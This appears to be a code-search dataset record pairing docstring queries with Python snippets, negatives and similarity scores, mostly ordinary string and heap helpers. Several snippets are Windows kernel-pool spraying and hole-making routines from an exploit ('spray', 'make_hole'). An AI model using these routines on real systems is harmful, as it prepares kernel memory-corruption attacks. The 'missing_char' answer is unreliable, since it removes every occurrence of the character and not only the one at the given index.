match and not before and \".\" not in after:\n return self._new + after\n else:\n return name", "def clean(input):\n output = input[0]\n for char in input:\n if output[-1] != char: \n output += char\n return output", "def keeponly(s, keep):\n return ''.join([x for x in s if x in keep])", "def normalize_prefix(string, logger_=_LOGGER):\n string = str(string)\n\n if not re.match(\"[0-9]\", string):\n if not re.match(\"^[lrmnLRMN]_\", string):\n new_string = string[0].upper() + \"_\" + string[1:]\n return new_string\n return string\n logger.log(level=\"warning\", message=\"Prefix has a number\", logger=logger_)\n return string", "def pig_word(self, original):\n word = original.lower()\n if word[0] in \"aeiou\":\n new_word = word + 'ay'\n else:\n new_word = word[1:] + word[0] + 'ay'\n return new_word", "def _swap_negation(self):\n\n if self.text.startswith('no '):\n self.text = self.text[3:]\n else:\n self.text = 'no ' + self.text\n return self", "def StripPrefix(string, prefix):\n assert string.startswith(prefix)\n return string[len(prefix):]", "def strip_start(h, s):\n if h.startswith(s):\n h = h[len(s):]\n return h", "def fix_extra(in_str):\n spaced = camel_re.sub(\"_\", in_str)\n return spaced.split(\"_\")[0]", "def strip_str(str: str) -> str:\r\n return ''.join(re.findall(ARTIST_MATCH_REGEX, str)).lower()", "def string_reduce(string):\n # It may seem a bad idea to not even return 'the reckoning' from\n # symbol '\"The Reckonging\"' but we rduce user input as well.\n\n # First remove quotes so the stopwords turn up at the front\n ret = re.sub(ur\"([\\W\\s]+)\", \" \", string, flags=re.U | re.I).strip().lower()\n return re.sub(ur\"(^the|^a|^an)\\b\", \"\", ret, flags=re.U).strip()", "def prefix_replace(original, old, new):\n ..." ]
[ "0.5966453", "0.583148", "0.58086413", "0.5792367", "0.57580304", "0.5723029", "0.571695", "0.5671791", "0.56482613", "0.5645488", "0.5641456", "0.55824554", "0.55234843", "0.55119824", "0.5483535", "0.5425228", "0.5415149", "0.53764623", "0.53486335", "0.53302264", "0.53292775", "0.5316638", "0.5316001", "0.5310435", "0.530353", "0.52949715", "0.5286381", "0.5282009", "0.52747893", "0.5263749" ]
0.7481777
0
Given a nonempty string and an int n, return a new string where the char at index n has been removed. The value of n will be a valid index of a char in the original string.
def missing_char(str, n): if n<=len(str): str = str.replace(str[n], "") return str
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def str_remove(string: str, index: int) -> str: # _3 [✅]\n if len(string) == 0:\n raise ValueError # put the msg inside here - refer to the doc \n else:\n return string.replace(string[index], '')", "def rotate(string, n):\r\n # default no change unless n is negative or positive\r\n rotated_string = string\r\n if n > 0:\r\n rotated_string = string[n:] + string[:n]\r\n elif n < 0:\r\n # calc how many letters remain after n characters are removed\r\n difference = len(string) - abs(n)\r\n # last n characters\r\n last_n = string[difference:]\r\n # remainder of string after n characters are chopped off end\r\n remainder_string = string[:difference]\r\n rotated_string = last_n + remainder_string\r\n return rotated_string", "def remove(string, to_remove):\n new_string = str(\"\")\n i = 0\n while i < len(string):\n if string[i : i + len(to_remove)] == to_remove:\n i += len(to_remove)\n else:\n new_string += string[i]\n i += 1\n return new_string", "def move_to_end(s, n):\n first=s[0:n]\n return s[n:] + first", "def remove_letter(letter, strng):", "def lstrip(s, ch):\n i = 0\n try:\n while s[i] == ch:\n i = i+1\n return s[i:]\n except IndexError:\n return \"\"", "def rstrip(s, ch):\n try:\n if s[-1] != ch:\n return s\n i = -2\n while s[i] == ch:\n i = i-1\n return s[:i+1]\n except IndexError:\n return \"\"", "def truncate(string, chars_number):\n return string[:chars_number] + '..' if len(string) > chars_number else string", "def read_nchars(string, n=1):\n return string[:n]", "def rebuild_string(string, removed_indices):\n return ''.join(string[idx] for idx in range(len(string)) if idx not in removed_indices)", "def __remove(self, text, start_index, count):\n\n return text[:start_index] + text[start_index + count:]", "def remove_char(str, to_delete):\n\n out_str = \"\"\n\n delete_set = set(to_delete)\n\n for char in str:\n if char not in delete_set:\n out_str += char\n\n return out_str", "def RIGHT(string, num_chars=1):\n if num_chars < 0:\n raise ValueError(\"num_chars invalid\")\n return string[-num_chars:]", "def remove_letter(letter, strng):\n remlet = \"\"\n for char in strng:\n if char != letter:\n remlet += char\n return remlet", "def de_bruijn(k, n):\n alphabet = k\n k = len(k)\n\n a = [0] * k * n\n sequence = []\n\n def db(t, p):\n if t > n:\n if n % p == 0:\n sequence.extend(a[1:p + 1])\n else:\n a[t] = a[t - p]\n db(t + 1, p)\n for j in range(a[t - p] + 1, k):\n a[t] = j\n db(t + 1, t)\n\n db(1, 1)\n sequence.extend(sequence[:n - 1])\n\n return \"\".join(alphabet[i] for i in sequence)", "def removeExtraChars(inStr, char):\n for i in range(5):\n inStr = inStr.replace(char+char, char)\n return inStr", "def shorten(strings, n):\n return sorted(strings, key=lambda x: x[n])", "def retrieve_sub(s, n):\n subs = []\n for idx, char in enumerate(s):\n sub = char\n c = 1\n for next_char in s[idx + 1:]:\n if c >= n:\n break\n else:\n sub += next_char\n c += 1\n subs.append(sub)\n return [x for x in subs if len(x) == n]", "def reversed_of_string(n):\n return ''.join(reversed(n))", "def without_end(s):\n string = s[1:-1]\n return string", "def del_pos(s):\n if s.endswith(\"/n\") or s.endswith(\"/a\") or s.endswith(\"/v\") or s.endswith(\"/r\"):\n s = s[:-2]\n return s", "def peek(string, n=0):\n return string[:n]", "def remove(somestring, sub):\n location = somestring.find(sub)\n length = len(sub)\n part_before = somestring[:length+location]\n part_after = somestring[location+length:]\n return part_before + part_after", "def _nth_letter(n):\r\n\treturn string.ascii_lowercase[n % len(string.ascii_lowercase)]", "def remove_chars(old_str, chars):\n new_string = old_str\n for char in chars:\n new_string = new_string.replace(char, '')\n \n return new_string", "def __replace_negative_for_n__(self, text):\n # | - __replace_negative_for_n__\n lst = [pos for pos, char in enumerate(text) if char == \"n\"]\n\n for lett in lst:\n if text[lett + 1].isdigit() is True:\n text = text[:lett] + \"-\" + text[lett + 1:]\n\n return(text)\n # __|", "def slicing(s):\n return s[:10] + s[-10:] if len(s) > 10 else s", "def sequence_del(my_str):\n next = \"\"\n new_str = \"\"\n for index, letter in enumerate(my_str):\n if index + 1 < len(my_str):\n next = my_str[index + 1]\n else:\n new_str += letter\n if not (letter == next):\n new_str += letter\n return new_str", "def backwards(s, index=-1):\n if len(s) == 0 or -index-1 == len(s):\n # stops the recursion, if the index has reached the start of the string\n return ''\n else:\n return s[index] + backwards(s, index-1)", "def nth_word(value: str, n: int) -> str:\n return value.split()[n]" ]
[ "0.6960446", "0.68922", "0.6213379", "0.6067694", "0.6039113", "0.5947728", "0.5931125", "0.5927239", "0.5870239", "0.58420336", "0.5795402", "0.5783907", "0.57417816", "0.57340825", "0.5733605", "0.56910557", "0.5682058", "0.5676471", "0.5627421", "0.5623321", "0.5617884", "0.5589845", "0.55833805", "0.557328", "0.55320054", "0.552141", "0.55135286", "0.550985", "0.55028313", "0.5488941" ]
0.8276236
0
Given a string, we'll say that the front is the first 3 chars of the string. If the string length is less than 3, the front is whatever is there. Return a new string which is 3 copies of the front.
def front3(str): if len(str)<4: return 3*str else: return 3*str[:3]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def filter_min_length(self, string):\n newstring = string\n length = len(newstring)\n min_length = 3\n num_to_add = min_length - length\n while num_to_add > 0:\n newstring = newstring + \"x\"\n num_to_add = num_to_add - 1\n\n return newstring", "def third_mixup(seq):\n len_third = int(len(seq) / 3)\n third_mixup = seq[-len_third:] + seq[:-len_third]\n return third_mixup", "def replace_thirds(seq):\n third = int(len(seq)/3)\n middle_third = seq[third:-third]\n last_third = seq[-third:]\n first_third = seq[0:third]\n seq_copy = middle_third + last_third + first_third\n return seq_copy", "def replace_thirds(seq):\n third = int(len(seq)/3)\n middle_third = seq[third:-third]\n last_third = seq[-third:]\n first_third = seq[0:third]\n seq_copy = middle_third + last_third + first_third\n return seq_copy", "def first_two(s):\n if len(s) >= 2:\n string = s[0:2]\n return string\n elif len(s) < 2:\n return s", "def last_first_middle_third(seq):\n # Using the length of the sequence, figure out roughly what one third should be\n one_third = len(seq) // 3\n\n new_seq = list(seq[-one_third:])\n new_seq.extend(seq[:-one_third])\n return format_seq(seq, new_seq)", "def prefix(sequence, l):\n if l > len(sequence):\n return sequence\n else:\n return sequence[:l]", "def Left(text, number):\n return text[:number]", "def third_reorder(seq):\n third = len(seq)//3\n return seq[third:-third]+seq[-third:]+seq[:third]", "def front_back(str):\r\n if len(str)<=1:\r\n return str\r\n mid = str[1:-1]\r\n return str[-1] + mid + str[0]", "def not_string(str):\r\n if len(str)>=3 and str[:3]=='not':\r\n return str\r\n else:\r\n return \"not\" + str", "def get_fixed_length_string(string: str, length=20) -> str:\n if len(string) > length:\n return f\"{string[: length - 3]}...\"\n spacing = \"\".join(\" \" for _ in range(length - len(string)))\n return f\"{string}{spacing}\"", "def slicing(s):\n return s[:10] + s[-10:] if len(s) > 10 else s", "def LEFT(string, num_chars=1):\n if num_chars < 0:\n raise ValueError(\"num_chars invalid\")\n return string[:num_chars]", "def peek(string, n=0):\n return string[:n]", "def cut_string(string, limit=30):\n if len(string) <= limit:\n return string\n else:\n return string[:limit-3] + '...'", "def truncate_middle(path: str, acceptable_len: int):\n if len(path) <= acceptable_len:\n return path\n # half of the size, minus the 3 .'s\n n_2 = int(acceptable_len / 2 - 3)\n # whatever's left\n n_1 = int(acceptable_len - n_2 - 3)\n return f\"{path[:n_1]}...{path[-n_2:]}\"", "def rev_word3(s):\n\twords = []\n\tlength = len(s)\n\tspaces = [' ']\n\n\t# Index Tracker\n\ti = 0\n\n\t# While index is less than length of string\n\twhile i < length:\n\n\t\t# If element isn't a space\n\t\tif s[i] not in spaces:\n\n\t\t\t# The word starts at this index\n\t\t\tword_start = i\n\n\t\t\twhile i < length and s[i] not in spaces:\n\t\t\t\t# Get index where the word ends\n\t\t\t\ti += 1\n\n\t\t\t# Append that word to the list\n\t\t\twords.append(s[word_start:i])\n\n\t\ti += 1\n\n\t# Join the reversed words\n\treturn ' '.join(reversed(words))", "def short_str(s: str, length=35) -> str:\n if len(s) > length:\n return s[:length - 3] + '...'\n else:\n return s", "def clip(st,length):\n if len(st) > length:\n return st[:length] + \"...\"\n else:\n return st", "def top_three_letters(string):\n print(Counter(string))\n print(Counter(string).most_common(3))", "def rearrange_thirds(seq):\n length = int(len(seq) / 3)\n new_seq = seq[-length:] + seq[:length] + seq[length:-length]\n return new_seq", "def replace_prefix(word, prefix):\r\n length_prefix = len(prefix)\r\n length_word = len(word)\r\n \r\n if length_prefix > length_word:\r\n return prefix\r\n\r\n #print(word[:length_prefix])\r\n word = prefix + word[length_prefix:]\r\n\r\n return word", "def uniquely_shorten(string, length):\n\n if len(string) <= length and not (len(string) == length and\n string.startswith(SHORTENED_PREFIX)):\n return string\n\n h = hashlib.sha256()\n h.update(\"%s \" % length)\n h.update(string)\n hash_text = h.hexdigest()\n\n return SHORTENED_PREFIX + hash_text[:length-len(SHORTENED_PREFIX)]", "def lt_3(self, index):\n word = self.get_prev_word(index, orignal=True)\n return len(word) < 3", "def front_back(string):\n pass", "def trunc_string(string, length=50):\n if len(string)>length:\n return \"%s...\" % string[:length-3]\n else:\n return string", "def strprevling(prefix):\n if not prefix:\n ## There is no prevling for the null string\n return prefix\n s = prefix[:-1]\n c = ord(prefix[-1])\n if c > 0:\n s += unichr(c - 1) + unichr(0xffff)\n return s", "def sameThreeCharStartPredicate(field):\n\n if len(field) < 3:\n return ()\n\n return (field[:3], )", "def shorten(string, maxLen, last):\n if len(string) <= maxLen:\n return string\n string = string[:maxLen]\n string = string[::-1]\n found = re.search(re.escape(last), string)\n if found:\n string = string[found.start():]\n string = string[::-1]\n return string" ]
[ "0.65979856", "0.63354737", "0.6301724", "0.6301724", "0.6243326", "0.6228791", "0.6216042", "0.6029894", "0.5991379", "0.59705275", "0.5832232", "0.5798461", "0.5776897", "0.57416624", "0.56858873", "0.566699", "0.5666881", "0.56637913", "0.56535786", "0.5597575", "0.5541995", "0.5528354", "0.5507345", "0.5491778", "0.54658175", "0.545906", "0.54579306", "0.54447806", "0.54267716", "0.5424306" ]
0.8477923
0
Spray the heap with objects which will allow us to create the required holes later
def spray(required_hole_size): global pool_object_handles good_object = find_object_to_spray(required_hole_size) for i in range(SPRAY_COUNT): pool_object_handles.append(allocate_object(good_object, i)) print "[+] Spray done!" return good_object
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self):\n self.heap = []", "def __init__(self):\n self.heap = []", "def __init__(self):\n self.heap = []", "def __init__(self):\n self.heap = []\n self.stack = []", "def __init__(self):\n self.heap1 = []\n self.heap2 = []\n self.size = 0", "def __init__(self):\n self.heap = [None]", "def __init__(self):\n self.stack = []\n self.heap = []", "def __init__(self):\n\n self.container2 = []\n heapq.heapify(self.container2)", "def gimme_the_hole(required_hole_size):\n\tgood_object = spray(required_hole_size)\n\tmake_hole(required_hole_size, good_object)\n\treturn good_object", "def __init__(self):\n self.stream_data_left = []\n heapq.heapify(self.stream_data_left)\n self.stream_data_right = []\n heapq.heapify(self.stream_data_right)", "def __init__(self):\n self.heapList = [0]\n self.currentSize = 0", "def __init__(self):\n super(_SerializedEventHeap, self).__init__()\n self._heap = []\n self.data_size = 0", "def make_hole(required_hole_size, good_object):\n\tglobal pool_object_handles\n\tnr_to_free = required_hole_size / kernel_object_sizes[good_object]\n\tfor i in range(0, SPRAY_COUNT,16):\n\t\tfor j in range(0,nr_to_free):\n\t\t\tkernel32.CloseHandle(pool_object_handles[i + j])\n\t\t\tpool_object_handles[i + j] = None\n\tprint \"[+] Making holes done!\"", "def __init__(self):\n # max heap\n self.small = []\n # min heap\n self.large = []", "def __init__(self):\n self.max_heap = MaxHeap()\n self.min_heap = MinHeap()", "def __init__(self):\r\n self.maxHeap = []\r\n self.minHeap = []", "def __init__(self):\n self.min_heap = []\n self.max_heap = []\n self.size_max, self.size_min = 0, 0", "def __init__(self):\n self.__max_heap = []\n self.__min_heap = []", "def __init__(self):\n # Initialize a new binary min heap to store the items\n self.heap = MinHeap()", "def __init__(self):\n self.min_heap = []\n self.max_heap = []", "def __init__(self, *args):\n this = _ida_hexrays.new_hexwarns_t(*args)\n try: self.this.append(this)\n except: self.this = this", "def __init__(self, x):\n self.elements = x\n self._heapify()", "def heapify(self):\n heapify(self._heap)", "def __init__(self, heap_used=None, heap_committed=None, heap_max=None, non_heap_used=None, non_heap_committed=None, non_heap_max=None, direct_count=None, direct_used=None, direct_max=None, mapped_count=None, mapped_used=None, mapped_max=None, memory_segments_available=None, memory_segments_total=None, garbage_collectors=None): # noqa: E501 # noqa: E501\n self._heap_used = None\n self._heap_committed = None\n self._heap_max = None\n self._non_heap_used = None\n self._non_heap_committed = None\n self._non_heap_max = None\n self._direct_count = None\n self._direct_used = None\n self._direct_max = None\n self._mapped_count = None\n self._mapped_used = None\n self._mapped_max = None\n self._memory_segments_available = None\n self._memory_segments_total = None\n self._garbage_collectors = None\n self.discriminator = None\n if heap_used is not None:\n self.heap_used = heap_used\n if heap_committed is not None:\n self.heap_committed = heap_committed\n if heap_max is not None:\n self.heap_max = heap_max\n if non_heap_used is not None:\n self.non_heap_used = non_heap_used\n if non_heap_committed is not None:\n self.non_heap_committed = non_heap_committed\n if non_heap_max is not None:\n self.non_heap_max = non_heap_max\n if direct_count is not None:\n self.direct_count = direct_count\n if direct_used is not None:\n self.direct_used = direct_used\n if direct_max is not None:\n self.direct_max = direct_max\n if mapped_count is not None:\n self.mapped_count = mapped_count\n if mapped_used is not None:\n self.mapped_used = mapped_used\n if mapped_max is not None:\n self.mapped_max = mapped_max\n if memory_segments_available is not None:\n self.memory_segments_available = memory_segments_available\n if memory_segments_total is not None:\n self.memory_segments_total = memory_segments_total\n if garbage_collectors is not None:\n self.garbage_collectors = garbage_collectors", "def make_objects(self):\n pass", "def __init__(self, heap=[]):\n\n # logger_cagada.debug(\"pero si el orig heap %s\" % heap)\n heapq.heapify(heap)\n # logger_cagada.debug(\"a cihnga el heap %s\" % heap)\n self.heap = heap\n self.entry_finder = dict({i[-1]: i for i in heap})\n # logger_cagada.debug(\"el finder es %s\" % self.entry_finder)\n self.REMOVED = sys.maxsize", "def __init__(self):\n self.max_heap = list()\n self.min_heap = list()", "def testOneSize(self):\n hd = HeapDict(size=1)\n hd.push('a', 2)\n hd.push('a', 1)\n hd.push('b', 3)\n hd.push('b', 4)\n self.assertEqual(hd.get_result(), {'a': [2], 'b': [4]})", "def __init__(self):\n self.minheap = []\n self.maxheap = []", "def __init__(self):\n self.minheap = []\n self.maxheap = []\n self.len_min = self.len_max = 0" ]
[ "0.65388066", "0.65388066", "0.65388066", "0.6477379", "0.6462962", "0.64020336", "0.63523936", "0.6230689", "0.619596", "0.61713964", "0.613623", "0.5981633", "0.59274656", "0.5911174", "0.5850001", "0.5822494", "0.5817438", "0.5740892", "0.57295054", "0.57109493", "0.56985694", "0.5667988", "0.5665564", "0.56588876", "0.56446093", "0.56414336", "0.56330305", "0.5618302", "0.5602727", "0.5594154" ]
0.75047916
0
Making holes in the sprayd kernel
def make_hole(required_hole_size, good_object): global pool_object_handles nr_to_free = required_hole_size / kernel_object_sizes[good_object] for i in range(0, SPRAY_COUNT,16): for j in range(0,nr_to_free): kernel32.CloseHandle(pool_object_handles[i + j]) pool_object_handles[i + j] = None print "[+] Making holes done!"
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setHolesCoordinates(self):\r\n # productive\r\n profprint()\r\n self.p = [[0 for j in range(63)] for j in range(3)]\r\n self.p[0][0] = 35\r\n self.p[1][0] = 34\r\n self.p[0][1] = 25\r\n self.p[1][1] = 36.679\r\n self.p[0][2] = 17.679\r\n self.p[1][2] = 44\r\n self.p[0][3] = 15\r\n self.p[1][3] = 54\r\n self.p[0][4] = 17.679\r\n self.p[1][4] = 64\r\n self.p[0][5] = 25\r\n self.p[1][5] = 71.321\r\n self.p[0][6] = 35\r\n self.p[1][6] = 74\r\n self.p[0][7] = 45\r\n self.p[1][7] = 71.321\r\n self.p[0][8] = 52.321\r\n self.p[1][8] = 64\r\n self.p[0][9] = 55\r\n self.p[1][9] = 54\r\n self.p[0][10] = 52.321\r\n self.p[1][10] = 44\r\n self.p[0][11] = 45\r\n self.p[1][11] = 36.679\r\n self.p[0][12] = 29.791\r\n self.p[1][12] = 24.456\r\n self.p[0][13] = 20\r\n self.p[1][13] = 28.019\r\n self.p[0][14] = 12.019\r\n self.p[1][14] = 34.716\r\n self.p[0][15] = 6.809\r\n self.p[1][15] = 43.739\r\n self.p[0][16] = 5\r\n self.p[1][16] = 54\r\n self.p[0][17] = 6.809\r\n self.p[1][17] = 64.261\r\n self.p[0][18] = 12.019\r\n self.p[1][18] = 73.284\r\n self.p[0][19] = 20\r\n self.p[1][19] = 79.981\r\n self.p[0][20] = 29.791\r\n self.p[1][20] = 83.544\r\n self.p[0][21] = 40.209\r\n self.p[1][21] = 83.544\r\n self.p[0][22] = 50\r\n self.p[1][22] = 79.981\r\n self.p[0][23] = 57.981\r\n self.p[1][23] = 73.284\r\n self.p[0][24] = 63.191\r\n self.p[1][24] = 64.262\r\n self.p[0][25] = 65\r\n self.p[1][25] = 54\r\n self.p[0][26] = 63.191\r\n self.p[1][26] = 43.739\r\n self.p[0][27] = 57.981\r\n self.p[1][27] = 34.716\r\n self.p[0][28] = 50\r\n self.p[1][28] = 28.019\r\n self.p[0][29] = 40.209\r\n self.p[1][29] = 24.456\r\n self.p[0][30] = 35\r\n self.p[1][30] = 14\r\n self.p[0][31] = 24.647\r\n self.p[1][31] = 15.363\r\n self.p[0][32] = 15\r\n self.p[1][32] = 19.359\r\n self.p[0][33] = 15\r\n self.p[1][33] = 88.641\r\n self.p[0][34] = 24.647\r\n self.p[1][34] = 92.637\r\n self.p[0][35] = 35\r\n self.p[1][35] = 94\r\n self.p[0][36] = 45.353\r\n self.p[1][36] = 92.637\r\n self.p[0][37] = 55\r\n self.p[1][37] = 88.641\r\n self.p[0][38] = 55\r\n self.p[1][38] = 19.359\r\n self.p[0][39] = 45.353\r\n self.p[1][39] = 15.363\r\n self.p[0][40] = 30.642\r\n self.p[1][40] = 4.19\r\n self.p[0][41] = 22.059\r\n self.p[1][41] = 5.704\r\n self.p[0][42] = 22.059\r\n self.p[1][42] = 102.296\r\n self.p[0][43] = 30.642\r\n self.p[1][43] = 103.81\r\n self.p[0][44] = 39.358\r\n self.p[1][44] = 103.81\r\n self.p[0][45] = 47.941\r\n self.p[1][45] = 102.296\r\n self.p[0][46] = 47.941\r\n self.p[1][46] = 5.704\r\n self.p[0][47] = 39.358\r\n self.p[1][47] = 4.19\r\n self.p[0][48] = 29.7\r\n self.p[1][48] = 44.82\r\n self.p[0][49] = 24.4\r\n self.p[1][49] = 54\r\n self.p[0][50] = 29.7\r\n self.p[1][50] = 63.18\r\n self.p[0][51] = 40.3\r\n self.p[1][51] = 63.18\r\n self.p[0][52] = 45.6\r\n self.p[1][52] = 54\r\n self.p[0][53] = 40.3\r\n self.p[1][53] = 44.82\r\n self.p[0][54] = 35\r\n self.p[1][54] = 54\r\n self.p[0][55] = 9\r\n self.p[1][55] = 12\r\n self.p[0][56] = 5\r\n self.p[1][56] = 18\r\n self.p[0][57] = 5\r\n self.p[1][57] = 90\r\n self.p[0][58] = 9\r\n self.p[1][58] = 96\r\n self.p[0][59] = 61\r\n self.p[1][59] = 96\r\n self.p[0][60] = 65\r\n self.p[1][60] = 90\r\n self.p[0][61] = 65\r\n self.p[1][61] = 18\r\n self.p[0][62] = 61\r\n self.p[1][62] = 12\r\n\r\n return self.p", "def setHolesCoordinates(self):\n #productive\n profprint()\n self.p = [[0 for j in range(63)] for j in range(3)]\n self.p[0][0]=35\n self.p[1][0]=34\n self.p[0][1]=25\n self.p[1][1]=36.679\n self.p[0][2]=17.679\n self.p[1][2]=44\n self.p[0][3]=15\n self.p[1][3]=54\n self.p[0][4]=17.679\n self.p[1][4]=64\n self.p[0][5]=25\n self.p[1][5]=71.321\n self.p[0][6]=35\n self.p[1][6]=74\n self.p[0][7]=45\n self.p[1][7]=71.321\n self.p[0][8]=52.321\n self.p[1][8]=64\n self.p[0][9]=55\n self.p[1][9]=54\n self.p[0][10]=52.321\n self.p[1][10]=44\n self.p[0][11]=45\n self.p[1][11]=36.679\n self.p[0][12]=29.791\n self.p[1][12]=24.456\n self.p[0][13]=20\n self.p[1][13]=28.019\n self.p[0][14]=12.019\n self.p[1][14]=34.716\n self.p[0][15]=6.809\n self.p[1][15]=43.739\n self.p[0][16]=5\n self.p[1][16]=54\n self.p[0][17]=6.809\n self.p[1][17]=64.261\n self.p[0][18]=12.019\n self.p[1][18]=73.284\n self.p[0][19]=20\n self.p[1][19]=79.981\n self.p[0][20]=29.791\n self.p[1][20]=83.544\n self.p[0][21]=40.209\n self.p[1][21]=83.544\n self.p[0][22]=50\n self.p[1][22]=79.981\n self.p[0][23]=57.981\n self.p[1][23]=73.284\n self.p[0][24]=63.191\n self.p[1][24]=64.262\n self.p[0][25]=65\n self.p[1][25]=54\n self.p[0][26]=63.191\n self.p[1][26]=43.739\n self.p[0][27]=57.981\n self.p[1][27]=34.716\n self.p[0][28]=50\n self.p[1][28]=28.019\n self.p[0][29]=40.209\n self.p[1][29]=24.456\n self.p[0][30]=35\n self.p[1][30]=14\n self.p[0][31]=24.647\n self.p[1][31]=15.363\n self.p[0][32]=15\n self.p[1][32]=19.359\n self.p[0][33]=15\n self.p[1][33]=88.641\n self.p[0][34]=24.647\n self.p[1][34]=92.637\n self.p[0][35]=35\n self.p[1][35]=94\n self.p[0][36]=45.353\n self.p[1][36]=92.637\n self.p[0][37]=55\n self.p[1][37]=88.641\n self.p[0][38]=55\n self.p[1][38]=19.359\n self.p[0][39]=45.353\n self.p[1][39]=15.363\n self.p[0][40]=30.642\n self.p[1][40]=4.19\n self.p[0][41]=22.059\n self.p[1][41]=5.704\n self.p[0][42]=22.059\n self.p[1][42]=102.296\n self.p[0][43]=30.642\n self.p[1][43]=103.81\n self.p[0][44]=39.358\n self.p[1][44]=103.81\n self.p[0][45]=47.941\n self.p[1][45]=102.296\n self.p[0][46]=47.941\n self.p[1][46]=5.704\n self.p[0][47]=39.358\n self.p[1][47]=4.19\n self.p[0][48]=29.7\n self.p[1][48]=44.82\n self.p[0][49]=24.4\n self.p[1][49]=54\n self.p[0][50]=29.7\n self.p[1][50]=63.18\n self.p[0][51]=40.3\n self.p[1][51]=63.18\n self.p[0][52]=45.6\n self.p[1][52]=54\n self.p[0][53]=40.3\n self.p[1][53]=44.82\n self.p[0][54]=35\n self.p[1][54]=54\n self.p[0][55]=9\n self.p[1][55]=12\n self.p[0][56]=5\n self.p[1][56]=18\n self.p[0][57]=5\n self.p[1][57]=90\n self.p[0][58]=9\n self.p[1][58]=96\n self.p[0][59]=61\n self.p[1][59]=96\n self.p[0][60]=65\n self.p[1][60]=90\n self.p[0][61]=65\n self.p[1][61]=18\n self.p[0][62]=61\n self.p[1][62]=12\n\n return self.p", "def applyKernelToPoints(image,pts,kernel,border_type='BLACK'):\n \n \n pts=np.asarray(pts)\n image=np.asarray(image)\n image.shape\n if len(image.shape)>2:\n grayscale=False\n shaperesult=(len(pts),image.shape[2])\n elif len(image.shape)==1:\n image=image.reshape(1,image.shape[0])\n shaperesult=len(pts)\n grayscale=True\n\n else:\n grayscale=True\n\n # Kernel dimensions - they are integers\n krows=kernel.shape[0] \n kcols=kernel.shape[1]\n\n if krows%2==0:\n # Is even\n ldrows=(krows/2)-1\n udrows=krows/2\n \n else:\n # Is odd\n ldrows=krows/2\n udrows=krows/2\n\n if kcols%2==0:\n # Is even\n ldcols=(kcols/2)-1\n udcols=kcols/2\n else:\n # Is odd\n ldcols=kcols/2\n udcols=kcols/2\n\n #------------------------------------\n # ADD FRAME TO THE ORIGINAL IMAGE\n #------------------------------------\n\n dummyM=image.shape[0]+krows-1\n dummyN=image.shape[1]+kcols-1\n \n if grayscale==True:\n dummyimage=np.asarray(np.zeros((dummyM,dummyN)))\n \n else:\n dummyimage=np.asarray(np.zeros((dummyM,dummyN,image.shape[2])))\n\n if border_type==\"WHITE\":\n dummyimage=dummyimage+255\n\n elif border_type==\"ANTIALIAS\":\n # Fills top border\n dummyimage[0:ldrows,ldcols:ldcols+image.shape[1]]=image[image.shape[0]-ldrows:image.shape[0],:]\n\n # Fills bottom border\n dummyimage[(ldrows+image.shape[0]):,ldcols:(ldcols+image.shape[1])]=image[0:udrows,:]\n \n # Fills left border\n dummyimage[ldrows:ldrows+image.shape[0],0:ldcols]=image[:,image.shape[1]-ldcols:]\n\n # Fills right border\n dummyimage[ldrows:ldrows+image.shape[0],(ldcols+image.shape[1]):]=image[:,0:udcols]\n \n # Fills top, left corner\n dummyimage[0:ldrows,0:ldcols]=image[image.shape[0]-ldrows,image.shape[1]-ldcols]\n\n # Fills bottom, left corner\n dummyimage[(ldrows+image.shape[0]):,0:ldcols]=image[0:udrows,(image.shape[1]-ldcols):]\n \n # Fills top, right corner\n dummyimage[0:ldrows,(ldcols+image.shape[1]):]=image[(image.shape[0]-ldrows):,0:udcols]\n \n # Fills bottom, right corner\n dummyimage[(ldrows+image.shape[0]):,(ldcols+image.shape[1]):]=image[0:udrows,0:udcols]\n \n dummyimage[ldrows:ldrows+image.shape[0],ldcols:ldcols+image.shape[1]]=image \n \n result=np.asarray(np.zeros(shaperesult))\n \n pts[:,0]=pts[:,0]+ldrows\n pts[:,1]=pts[:,1]+ldcols\n \n for k in range(len(pts)):\n total=0\n \n for i in range(-ldrows,udrows+1):\n for j in range(-ldcols,udcols+1):\n total=total+dummyimage[i+pts[k,0],j+pts[k,1]]*kernel[i+ldrows,j+ldcols]\n \n \n result[k]=total\n \n \n return result", "def watershed(mask, img, plotImage = False, kernelSize = None):\n imgCopy = img.copy()\n maskCopy = np.array(mask.copy(), dtype=np.uint8)\n \n if kernelSize is None:\n kernelSize = 2\n\n # Finding sure foreground area\n #dist_transform = cv2.distanceTransform(mask, cv2.DIST_L2, 5)\n #ret, sure_fg = cv2.threshold(dist_transform,0.3*dist_transform.max(),255,0) #change the second argument to change the sensitivity \n maskClosed = skimage.morphology.closing(np.array(maskCopy, dtype=np.uint8))\n maskClosed = skimage.morphology.closing(np.array(maskClosed, dtype=np.uint8))\n kernel = np.ones((kernelSize,kernelSize), np.uint8)\n # maskCopy = img_as_bool(maskCopy)\n sure_fg = cv2.erode(maskClosed, kernel, iterations = 2) ###\n sure_fg = skimage.morphology.closing(np.array(sure_fg, dtype=np.uint8))\n # kernel = np.ones((2,2), np.uint8)\n # sure_fg = binary_closing(sure_fg, kernel)\n \n # sure background area\n #kernel = np.ones((5, 5), np.uint8)\n #sure_bg = cv2.dilate(mask, kernel, iterations = 1)\n sure_fg_bool = 1 - img_as_bool(sure_fg)\n # sure_bg = np.uint8(1 - morphology.medial_axis(sure_fg_bool)) ### \n sure_bg = np.uint8(1 - morphology.skeletonize(sure_fg_bool))\n sure_bg[0, :] = 1\n sure_bg[-1, :] = 1\n sure_bg[:, 0] = 1\n sure_bg[:, -1] = 1\n \n # Finding unknown region\n sure_fg = np.uint8(sure_fg)\n unknown = cv2.subtract(sure_bg, sure_fg)\n \n if plotImage:\n plt.figure()\n plt.imshow(sure_fg)\n plt.title(\"Inner Marker\")\n plt.figure()\n plt.imshow(sure_bg)\n plt.title(\"Outer Marker\")\n plt.figure()\n plt.imshow(unknown)\n plt.title(\"Unknown\")\n \n # Marker labelling\n ret, markers = cv2.connectedComponents(sure_fg)\n\n # Add one to all labels so that sure background is not 0, but 1\n markers = markers+1\n\n # Now, mark the region of unknown with zero\n markers[unknown==1] = 0\n \n if plotImage:\n plt.figure()\n plt.imshow(markers, cmap='jet')\n 